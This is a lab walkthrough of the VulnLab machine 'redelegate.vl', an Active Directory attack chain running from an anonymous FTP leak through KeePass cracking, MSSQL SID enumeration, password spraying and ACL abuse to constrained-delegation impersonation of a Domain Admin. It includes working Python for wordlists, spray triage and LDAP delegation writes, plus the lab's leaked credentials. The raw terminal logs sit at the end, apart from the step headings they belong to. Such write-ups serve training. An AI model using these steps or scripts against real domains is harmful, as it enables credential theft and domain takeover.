Anonymous FTP leaked a KeePass DB → cracked with custom wordlist → SQLGuest creds → MSSQL SID enum → password spray → ACL abuse → Constrained Delegation → DC pwned.
Platform: VulnLab
Difficulty: Medium
OS: Windows Server 2022
Domain: redelegate.vl
DC IP: 10.129.234.50
1. Reconnaissance
An initial Nmap scan against the target reveals a typical Windows Domain Controller profile:
SMB null authentication is accepted (Null Auth: True), but share enumeration and RID brute-forcing both fail with STATUS_ACCESS_DENIED, so the null session on its own yields little. Anonymous FTP, however, is wide open.
2. Anonymous FTP Enumeration
Logging in anonymously to FTP reveals three files:
CyberAudit.txt
Key Takeaway: ACLs are flagged as dangerous and still being remediated — a strong signal of exploitable misconfigurations.
TrainingAgenda.txt
Key Takeaway: The training content leaks the password pattern employees were warned against — SeasonYear! (e.g. Fall2024!, Summer2024!). This is the password format to target.
3. KeePass Password Cracking
Shared.kdbx is a KeePass database. We extract its hash with keepass2john and crack it with a custom wordlist built from the SeasonYear! pattern. Note that keepass2john prefixes the hash with the file name ("Shared:"), which must be stripped before Hashcat will parse it:
Extract hash
Build custom wordlist
Crack with Hashcat (mode 13400: KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Result: Fall2024!, cracked instantly and exactly the pattern the training agenda warned about.
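As an added example (my script, not the author's), the following builds the SeasonYear! wordlist and strips the "Shared:" prefix that keepass2john prepends; the seasons, year range and suffix variants are my assumptions about how the pattern drifts in practice:

```python
#!/usr/bin/env python3
"""SeasonYear! wordlist builder plus keepass2john-to-hashcat cleanup.

Added example for this write-up; it is not the author's script. The
seasons, year range and suffix variants below are assumptions about
what a "SeasonYear!" policy violation looks like in practice.
"""
import sys

SEASONS = ["Spring", "Summer", "Fall", "Autumn", "Winter"]
# Most likely first so hashcat hits the common case early.
SUFFIXES = ["!", "!!", "?", "#", "@", "1!", "1", ""]


def build_wordlist(years=range(2025, 2019, -1)):
    """Return candidate passwords ordered from most to least likely.

    Years iterate newest-first; casing and two-digit-year variants
    (fall2024!, FALL2024!, Fall24!) are added because users drift from
    the canonical form the training slide showed.
    """
    seen = set()
    words = []
    for year in years:
        for season in SEASONS:
            for suffix in SUFFIXES:
                base = f"{season}{year}{suffix}"
                short = f"{season}{str(year)[2:]}{suffix}"
                for variant in (base, base.lower(), base.upper(), short):
                    if variant not in seen:
                        seen.add(variant)
                        words.append(variant)
    return words


def hashcat_line(keepass2john_output: str) -> str:
    """Strip the 'dbname:' prefix keepass2john adds; hashcat -m 13400 wants the bare $keepass$ hash."""
    line = keepass2john_output.strip()
    if line.startswith("$keepass$"):
        return line
    name, sep, rest = line.partition(":")
    if sep and rest.startswith("$keepass$"):
        return rest
    raise ValueError("not a keepass2john line: %r" % keepass2john_output[:40])


if __name__ == "__main__":
    # Usage: keepass2john Shared.kdbx | python3 seasonyear.py hash.txt wordlist.txt
    #        hashcat -m 13400 hash.txt wordlist.txt
    hash_out, words_out = sys.argv[1], sys.argv[2]
    with open(hash_out, "w") as fh:
        for raw in sys.stdin:
            fh.write(hashcat_line(raw) + "\n")
    with open(words_out, "w") as fw:
        fw.write("\n".join(build_wordlist()) + "\n")
```

The wordlist is a few hundred entries, so even KeePass's slow KDF cracks in seconds; if it does not hit, widen the year range before reaching for rules.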
KeePass Contents
Opening the database reveals stored credentials:
Title               Username          Password
FTP                 FTPUser           SguPZBKdRyxWzvXRWy6U
FS01 Admin          Administrator     Spdv41gg4BlBgSYIW1gF
WEB01               WordPress Panel   cn4KOEgsHqvKXPjEnSD9
SQL Guest Access    SQLGuest          zDPBpaF4FywlqIv11vii
Timesheet Manager   Timesheet         hMFS4I0Kj8Rcd62vqi5X
Payroll App         Payroll           cVkqz4bCM7kJRSNlgx2G
SMB and LDAP authentication fail for every entry. MSSQL (port 1433), however, is open; it did not appear in the initial Nmap output above, so a full port scan (-p-) was needed to find it.
4. MSSQL Access & Domain User Enumeration
Connecting as SQLGuest to the MSSQL instance:
RID Brute-Force via SID Resolution
SQL Server's SUSER_SNAME() resolves a binary SID to an account name, and SUSER_SID() does the reverse. Every account in the domain shares the same SID prefix and differs only in the trailing RID, so by rewriting the last four bytes we can enumerate domain accounts from inside the database, even though RID brute-forcing over SMB was denied:
First, retrieve the SID of a known account with SUSER_SID():
The 24-byte domain prefix is 010500000000000515000000a185deefb22433798d8e847a: revision 1, sub-authority count 5, identifier authority 5, then the three domain sub-authorities (S-1-5-21-4024337825-2033394866-2055507597 in string form).
The last 4 bytes of a full SID are the RID, little-endian. Administrator = RID 500 = 0x1F4, encoded as f4010000.
Generate bulk queries for RIDs 1000–1500 (SUSER_SNAME() returns NULL for RIDs that are not assigned, so those rows can simply be filtered out):
5. Password Spraying
Using the cracked KeePass password Fall2024! against all discovered users:
Result: Marie.Curie:Fall2024! is a valid credential.
Note: Mallory.Roberts returns STATUS_ACCOUNT_RESTRICTION rather than STATUS_LOGON_FAILURE. That status is returned after the password has been accepted, so her password is very likely Fall2024! too, with a separate logon restriction in the way (e.g. a logon-type or workstation restriction; a disabled account would normally come back as STATUS_ACCOUNT_DISABLED instead). Keep such hits and retry them against other protocols rather than discarding them with the failures.
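Added example (mine, not the author's tooling) of the triage the note above implies: classify each spray result by its NT status so a STATUS_ACCOUNT_RESTRICTION hit is kept instead of being lost in the STATUS_LOGON_FAILURE noise, and a lockout is noticed before it spreads. The sample lines are constructed in nxc's output format; only the Marie.Curie and Mallory.Roberts outcomes come from the write-up, the other users are invented to exercise the remaining branches:

```python
#!/usr/bin/env python3
"""Triage password-spray output by NT status.

Added example for this write-up, not the author's tooling. SAMPLE_LINES
are constructed in the style of nxc's SMB output; the Marie.Curie and
Mallory.Roberts results mirror the text, the other users are invented.
"""
import re

LINE_RE = re.compile(
    r"\[(?P<mark>[+\-])\]\s+(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<password>\S+)"
    r"(?:\s+(?P<status>STATUS_\w+))?"
)

# Password was accepted but another check blocked the logon: keep the credential.
VALID_BUT_BLOCKED = {
    "STATUS_ACCOUNT_RESTRICTION",   # logon-type / workstation / policy restriction
    "STATUS_PASSWORD_EXPIRED",
    "STATUS_PASSWORD_MUST_CHANGE",
    "STATUS_LOGON_TYPE_NOT_GRANTED",
    "STATUS_INVALID_WORKSTATION",
    "STATUS_INVALID_LOGON_HOURS",
}

CATEGORIES = ("valid", "valid_but_blocked", "locked_out", "wrong_password", "review")

SAMPLE_LINES = [  # constructed, nxc-style
    "SMB 10.129.234.50 445 DC [-] redelegate.vl\\Alice.Example:Fall2024! STATUS_LOGON_FAILURE",
    "SMB 10.129.234.50 445 DC [+] redelegate.vl\\Marie.Curie:Fall2024!",
    "SMB 10.129.234.50 445 DC [-] redelegate.vl\\Mallory.Roberts:Fall2024! STATUS_ACCOUNT_RESTRICTION",
    "SMB 10.129.234.50 445 DC [-] redelegate.vl\\Bob.Example:Fall2024! STATUS_ACCOUNT_LOCKED_OUT",
    "SMB 10.129.234.50 445 DC [-] redelegate.vl\\Carol.Example:Fall2024! STATUS_ACCOUNT_DISABLED",
]


def classify(line: str):
    """Return (user, password, category) for one output line, or None if it is not a result line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    status = m.group("status")
    if m.group("mark") == "+":
        cat = "valid"
    elif status in VALID_BUT_BLOCKED:
        cat = "valid_but_blocked"
    elif status == "STATUS_ACCOUNT_LOCKED_OUT":
        # Lockout is reported regardless of the password: stop spraying this user.
        cat = "locked_out"
    elif status == "STATUS_LOGON_FAILURE":
        cat = "wrong_password"
    else:
        cat = "review"  # disabled, expired, unknown: look at it by hand
    return m.group("user"), m.group("password"), cat


def triage(lines):
    """Bucket usernames by category so the interesting ones are not scrolled past."""
    buckets = {c: [] for c in CATEGORIES}
    for line in lines:
        result = classify(line)
        if result:
            buckets[result[2]].append(result[0])
    return buckets


if __name__ == "__main__":
    for category, users in triage(SAMPLE_LINES).items():
        if users:
            print("%-18s %s" % (category, ", ".join(users)))
```

Pipe real nxc output through triage() and treat a non-empty locked_out bucket as the signal to pause the spray and check the lockout policy before the next password.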
6. ACL Abuse — ForceChangePassword
BloodHound Analysis
BloodHound reveals the following ACL chain:
Marie.Curie is a member of the Helpdesk group, which has ForceChangePassword (the User-Force-Change-Password extended right) over Helen.Frost. This lets us reset her password without knowing the current one. It is a destructive change: the legitimate user is locked out until the password is reset again, so record the account and the time for the report.
Exploit
WinRM Access
User flag obtained.
7. BloodHound Analysis
The full attack path from Helen.Frost continues:
IT has GenericAll over FS01$, giving full control over that computer object. In particular we can:
Reset the FS01$ account password, so we can authenticate as the machine account
Write msDS-AllowedToDelegateTo, choosing the delegation target (here cifs/DC.redelegate.vl)
Set TrustedToAuthForDelegation (Protocol Transition / S4U2Self)
8. Constrained Delegation Setup via GenericAll on FS01$
As Helen.Frost (member of IT group with GenericAll over FS01$):
Step 1 — Reset FS01$ computer account password
Step 2 — Configure Constrained Delegation target
Step 3 — Enable Protocol Transition (S4U2Self)
Verify
FS01$ is now configured for constrained delegation with protocol transition to cifs/DC.redelegate.vl.
9. S4U2Self / S4U2Proxy — Impersonating a Domain Admin
Choosing the right impersonation target
Initial attempts to impersonate Administrator failed with KDC_ERR_BADOPTION. On the S4U2Proxy step that is the usual symptom of the impersonated user being flagged "Account is sensitive and cannot be delegated" (NOT_DELEGATED in userAccountControl) or being a member of Protected Users; here the Administrator account carries that flag.
By enumerating the other Domain Admins, Ryan.Cooper was found to lack this protection, making him a valid impersonation target.
Step 1 — Get a TGT for FS01$
Step 2 — S4U2Self + S4U2Proxy to get a service ticket as Ryan.Cooper
Explanation:
S4U2Self: FS01$ requests a service ticket to itself on behalf of Ryan.Cooper. No credential for Ryan.Cooper is needed (protocol transition), and because TrustedToAuthForDelegation is set the ticket comes back forwardable, which is what makes the next step possible.
S4U2Proxy: FS01$ presents that ticket to request a service ticket for cifs/DC.redelegate.vl on behalf of Ryan.Cooper; the KDC allows it because that SPN is listed in FS01$'s msDS-AllowedToDelegateTo.
Step 3 — Access DC as Ryan.Cooper (Domain Admin+Root Flag)
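One added example (my code, not the author's commands) covering sections 6, 8 and 9 together: the userAccountControl bits behind steps 1 to 3 and the Verify step, the password reset that ForceChangePassword and step 1 both amount to, and the NOT_DELEGATED / Protected Users check used to pick an impersonation target. Host, DNs, credentials and the sample UAC values for the two Domain Admins are placeholders; the ldap3 calls are an assumed alternative to whatever tool the write-up used and are only imported when apply_delegation() runs:

```python
#!/usr/bin/env python3
"""userAccountControl logic behind the ACL-abuse, delegation and impersonation steps.

Added example for this write-up, not the author's commands. Host, DNs,
credentials and SAMPLE_DOMAIN_ADMINS are placeholders/constructed; the
ldap3 calls inside apply_delegation() are an assumed way of doing the
same LDAP writes (ldap3 is not imported until that function runs).
"""
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "TRUSTED_FOR_DELEGATION": 0x80000,             # unconstrained delegation
    "NOT_DELEGATED": 0x100000,                     # "Account is sensitive and cannot be delegated"
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,   # protocol transition: S4U2Self returns forwardable tickets
}
PROTECTED_USERS_RDN = "CN=Protected Users,"


def decode_uac(value: int):
    """Names of the known flags set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def enable_protocol_transition(uac: int) -> int:
    """Step 3 of the setup: set TRUSTED_TO_AUTH_FOR_DELEGATION and leave every other bit alone."""
    return uac | UAC_FLAGS["TRUSTED_TO_AUTH_FOR_DELEGATION"]


def can_be_impersonated(uac: int, member_of) -> bool:
    """S4U2Self/S4U2Proxy for this user only works if the account is enabled, not
    NOT_DELEGATED, and not in Protected Users (which the KDC also refuses to delegate)."""
    if uac & UAC_FLAGS["ACCOUNTDISABLE"] or uac & UAC_FLAGS["NOT_DELEGATED"]:
        return False
    return not any(dn.startswith(PROTECTED_USERS_RDN) for dn in member_of)


def pick_targets(candidates):
    """candidates: {sAMAccountName: (userAccountControl, [memberOf DNs])} -> usable names."""
    return [name for name, (uac, groups) in candidates.items() if can_be_impersonated(uac, groups)]


# Constructed to mirror the text: Administrator is sensitive, Ryan.Cooper is not.
SAMPLE_DOMAIN_ADMINS = {
    "Administrator": (UAC_FLAGS["NORMAL_ACCOUNT"] | UAC_FLAGS["NOT_DELEGATED"], []),
    "Ryan.Cooper": (UAC_FLAGS["NORMAL_ACCOUNT"], []),
}


def apply_delegation(host, bind_user, bind_password, computer_dn, new_password, target_spns):
    """Steps 1-3 as LDAP writes over LDAPS (the password reset requires it), bind_user as
    'DOMAIN\\user'. Returns the decoded userAccountControl read back afterwards (the Verify step)."""
    from ldap3 import Server, Connection, NTLM, BASE, ALL, MODIFY_REPLACE  # assumed dependency

    conn = Connection(Server(host, use_ssl=True, get_info=ALL), user=bind_user,
                      password=bind_password, authentication=NTLM, auto_bind=True)
    # Step 1: reset the computer account password. This is the same unicodePwd replace that
    # ForceChangePassword over Helen.Frost performs; both lock the real owner out.
    conn.extend.microsoft.modify_password(computer_dn, new_password)
    # Step 2: the constrained-delegation target list.
    conn.modify(computer_dn, {"msDS-AllowedToDelegateTo": [(MODIFY_REPLACE, target_spns)]})
    # Step 3: read-modify-write the UAC so existing bits (WORKSTATION_TRUST_ACCOUNT) survive.
    conn.search(computer_dn, "(objectClass=*)", search_scope=BASE, attributes=["userAccountControl"])
    current = int(conn.entries[0].userAccountControl.value)
    conn.modify(computer_dn, {"userAccountControl": [(MODIFY_REPLACE, [enable_protocol_transition(current)])]})
    # Verify: read the object back and decode what is now set.
    conn.search(computer_dn, "(objectClass=*)", search_scope=BASE,
                attributes=["userAccountControl", "msDS-AllowedToDelegateTo"])
    return decode_uac(int(conn.entries[0].userAccountControl.value))


if __name__ == "__main__":
    print("impersonation candidates:", pick_targets(SAMPLE_DOMAIN_ADMINS))
    after = enable_protocol_transition(UAC_FLAGS["WORKSTATION_TRUST_ACCOUNT"])
    print("FS01$ UAC after step 3: 0x%x %s" % (after, decode_uac(after)))
```

For the real run, fetch userAccountControl and memberOf for every Domain Admin with the same BASE-scope search pattern and hand the results to pick_targets(); it flags exactly the accounts that will not produce KDC_ERR_BADOPTION on S4U2Proxy.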
┌──(kali㉿kali)-[~]
└─$ nmap 10.129.234.50 -sCV
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-15 07:18 -0400
Nmap scan report for 10.129.234.50
Host is up (0.15s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24 01:11AM 434 CyberAudit.txt
| 10-20-24 05:14AM 2622 Shared.kdbx
|_10-20-24 01:26AM 580 TrainingAgenda.txt
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-15 11:19:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.redelegate.vl
| Not valid before: 2026-03-14T11:17:27
|_Not valid after: 2026-09-13T11:17:27
|_ssl-date: 2026-03-15T11:20:04+00:00; -4s from scanner time.
| rdp-ntlm-info:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: redelegate.vl
| DNS_Computer_Name: dc.redelegate.vl
| DNS_Tree_Name: redelegate.vl
| Product_Version: 10.0.20348
|_ System_Time: 2026-03-15T11:19:57+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -4s, deviation: 0s, median: -4s
| smb2-time:
| date: 2026-03-15T11:19:55
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.234.50 -u "" -p ""
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.50 445 DC [+] redelegate.vl\:
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.234.50 -u "" -p "" --shares
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.50 445 DC [+] redelegate.vl\:
SMB 10.129.234.50 445 DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.234.50 -u "" -p "" --rid-brute
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.50 445 DC [+] redelegate.vl\:
SMB 10.129.234.50 445 DC [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
┌──(kali㉿kali)-[~/Documents/redelegate]
└─$ ftp anonymous@10.129.234.50
Connected to 10.129.234.50.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||56593|)
125 Data connection already open; Transfer starting.
10-20-24 01:11AM 434 CyberAudit.txt
10-20-24 05:14AM 2622 Shared.kdbx
10-20-24 01:26AM 580 TrainingAgenda.txt
┌──(kali㉿kali)-[~/Documents/redelegate]
└─$ cat CyberAudit.txt
OCTOBER 2024 AUDIT FINDINGS
[!] CyberSecurity Audit findings:
1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs
[*] Remediation steps:
5) Prompt users to change their passwords: DONE
6) Check privileges for all users and remove high privileges: DONE
7) Remove unused objects in the domain: IN PROGRESS
8) Recheck ACLs: IN PROGRESS
┌──(kali㉿kali)-[~/Documents/redelegate]
└─$ cat TrainingAgenda.txt
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)
Friday 4th October | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one
Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?
Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password
Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them
┌──(kali㉿kali)-[~/Documents/redelegate]
└─$ keepass2john Shared.kdbx > hash.txt
# keepass2john prefixes the hash with the file name ("Shared:"); remove that prefix from hash.txt before feeding it to Hashcat
HELEN.FROST --[MemberOf]--> IT
IT --[GenericAll]--> FS01$ (computer account)
FS01$ --[can be configured for Constrained Delegation]--> cifs/DC.redelegate.vl
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Ryan.Cooper@[email protected]
┌──(kali㉿kali)-[~]
└─$ impacket-smbclient -k -no-pass DC.redelegate.vl
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use C$
# cd Users\Administrator\Desktop
# ls
drw-rw-rw- 0 Wed Oct 30 12:03:55 2024 .
drw-rw-rw- 0 Sun Oct 20 11:05:28 2024 ..
-rw-rw-rw- 282 Fri May 24 08:00:13 2024 desktop.ini
-rw-rw-rw- 34 Sun Mar 15 07:18:13 2026 root.txt
# get root.txt
┌──(kali㉿kali)-[~]
└─$ cat root.txt
21c2xxxxxxxxxxxxxxxxxxxxxx8186